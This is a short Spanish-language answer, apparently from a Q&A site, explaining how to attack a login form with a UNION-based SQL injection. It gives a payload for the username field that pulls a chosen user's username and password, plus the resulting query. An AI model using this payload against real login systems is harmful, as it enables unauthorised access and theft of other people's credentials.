Probablemente la consulta de inicio de sesión debería tener este aspecto.
select * from table
where username='user' and password='pass'
Ahora su objetivo es obtener la fila correspondiente al valor especificado como "nombre de usuario".
Entonces, para eso simplemente inyecte una consulta UNION , mejor no confundirse con otros métodos.
Aquí debajo va el valor del campo "nombre de usuario".
' UNION ALL SELECT username,password from users where username='ShihabSoft' --
Luego de inyectar la consulta final se verá así.
select * from users where username='' UNION ALL SELECT username,password from users where username='ShihabSoft' --
Entonces, si quieres obtener la fila de un usuario específico, simplemente cambia el valor 'ShihabSoft' a cualquier otro nombre de usuario.
Y es solo para un ejemplo porque ni siquiera especificó la consulta en su pregunta. Por lo tanto, el número de columnas en la consulta UNION puede diferir según el número de columnas especificado en el real consulta.